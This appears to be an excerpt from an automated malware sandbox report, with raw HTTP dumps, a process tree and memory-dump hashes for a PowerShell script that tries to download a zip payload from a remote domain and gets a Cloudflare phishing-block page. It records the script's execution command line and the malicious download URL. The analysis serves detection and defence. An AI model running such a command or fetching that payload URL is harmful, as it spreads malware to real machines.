                                2025-01-03 14:21:19 UTC809INData Raw: 31 31 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                Data Ascii: 11e2<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                2025-01-03 14:21:19 UTC1369INData Raw: 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42
                                Data Ascii: i/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementB
                                2025-01-03 14:21:19 UTC1369INData Raw: 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63
                                Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form ac
                                2025-01-03 14:21:19 UTC1039INData Raw: 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74
                                Data Ascii: n" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-it
                                2025-01-03 14:21:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.849707172.67.212.1074437256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2025-01-03 14:21:19 UTC169OUTGET /1234/bfoiuywh98ertyh/897654.zip HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                Host: digitalarmor.cyou
                                2025-01-03 14:21:20 UTC560INHTTP/1.1 403 Forbidden
                                Date: Fri, 03 Jan 2025 14:21:20 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dQYHCVVs8iMjq8hYeh9cqfEAT%2BBowAK4CY1NkOjUGRQ%2FoUNFIRaTOXq1GaxAM4RjvaglPEJ70CLxj9ljnqxGxuGlzrMd64nwwUgFqCgm9xDBt%2FsEfSmTV7lnrwREmzbKiNzITQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8fc3a278286c41d5-EWR
                                2025-01-03 14:21:20 UTC809INData Raw: 31 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                Data Ascii: 11e0<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                2025-01-03 14:21:20 UTC1369INData Raw: 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42
                                Data Ascii: i/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementB
                                2025-01-03 14:21:20 UTC1369INData Raw: 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63
                                Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form ac
                                2025-01-03 14:21:20 UTC1037INData Raw: 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d
                                Data Ascii: id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item
                                2025-01-03 14:21:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:09:21:07
                                Start date:03/01/2025
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\m.txt.ps1"
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
                                Start time:09:21:07
                                Start date:03/01/2025
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:09:21:14
                                Start date:03/01/2025
                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline"
                                Imagebase:0x7ff713080000
                                File size:2'759'232 bytes
                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:4
                                Start time:09:21:16
                                Start date:03/01/2025
                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD0D5.tmp" "c:\Users\user\AppData\Local\Temp\jjfh4dlp\CSC54EE39D9867F4A06B1E0C15F7422FD6E.TMP"
                                Imagebase:0x7ff756940000
                                File size:52'744 bytes
                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1530312129.00007FFB4A250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4a250000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0YIJ
                                  • API String ID: 0-95448640
                                  • Opcode ID: 4eeef4dd4ba2c18fa24e6802a5c35db5eb96944a2527501f5424a560bb2c9fdd
                                  • Instruction ID: f1cc4a13f317c9fac5ea5a8e082a6a8ad513012a5e4ddb71d341da6a8c7bdf67
                                  • Opcode Fuzzy Hash: 4eeef4dd4ba2c18fa24e6802a5c35db5eb96944a2527501f5424a560bb2c9fdd
                                  • Instruction Fuzzy Hash: D3D18271A1CA4E8FDB94EF68C455AED7BE1FF68310F2441AAD40DD7296CA34E841DB80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1530312129.00007FFB4A250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4a250000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e21d5e3080494d07f4be55bb80c2dee7e2c27e32ffa1b8089323b23cf8088de1
                                  • Instruction ID: 5e367de6951cf0e2e082264d266bd44869a24be99dd55cd801301c1ba6a0e98d
                                  • Opcode Fuzzy Hash: e21d5e3080494d07f4be55bb80c2dee7e2c27e32ffa1b8089323b23cf8088de1
                                  • Instruction Fuzzy Hash: D631E0B090D6888FDB46EFA8C8556FA7FF4EF56321F1400AFE089C7193DA685816C752
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1530312129.00007FFB4A250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4a250000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                  • Instruction ID: 9cf9a2aceb57cd3192490be8d01ebb07a3ce9bd241da95e90352169750108d82
                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                  • Instruction Fuzzy Hash: 3701A77010CB0C8FD748EF0CE051AA6B7E0FB95364F10056DE58AC3651D732E882CB41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1530312129.00007FFB4A250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffb4a250000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8zIJ$XwIJ
                                  • API String ID: 0-3990121986
                                  • Opcode ID: 4e41e6dc303716dd4ec9fb1db1cebbcf94fe2947b9f38ebe3e467f88442382a9
                                  • Instruction ID: 6bbe515d8df2cfeaffca1287bffcdfc74c4801267979e11ee074c2e67eb75c94
                                  • Opcode Fuzzy Hash: 4e41e6dc303716dd4ec9fb1db1cebbcf94fe2947b9f38ebe3e467f88442382a9
                                  • Instruction Fuzzy Hash: C06225A2A0CA864FE756FF7CD8515E97FA0FF96360B1841F7D088CB193D9186C06A391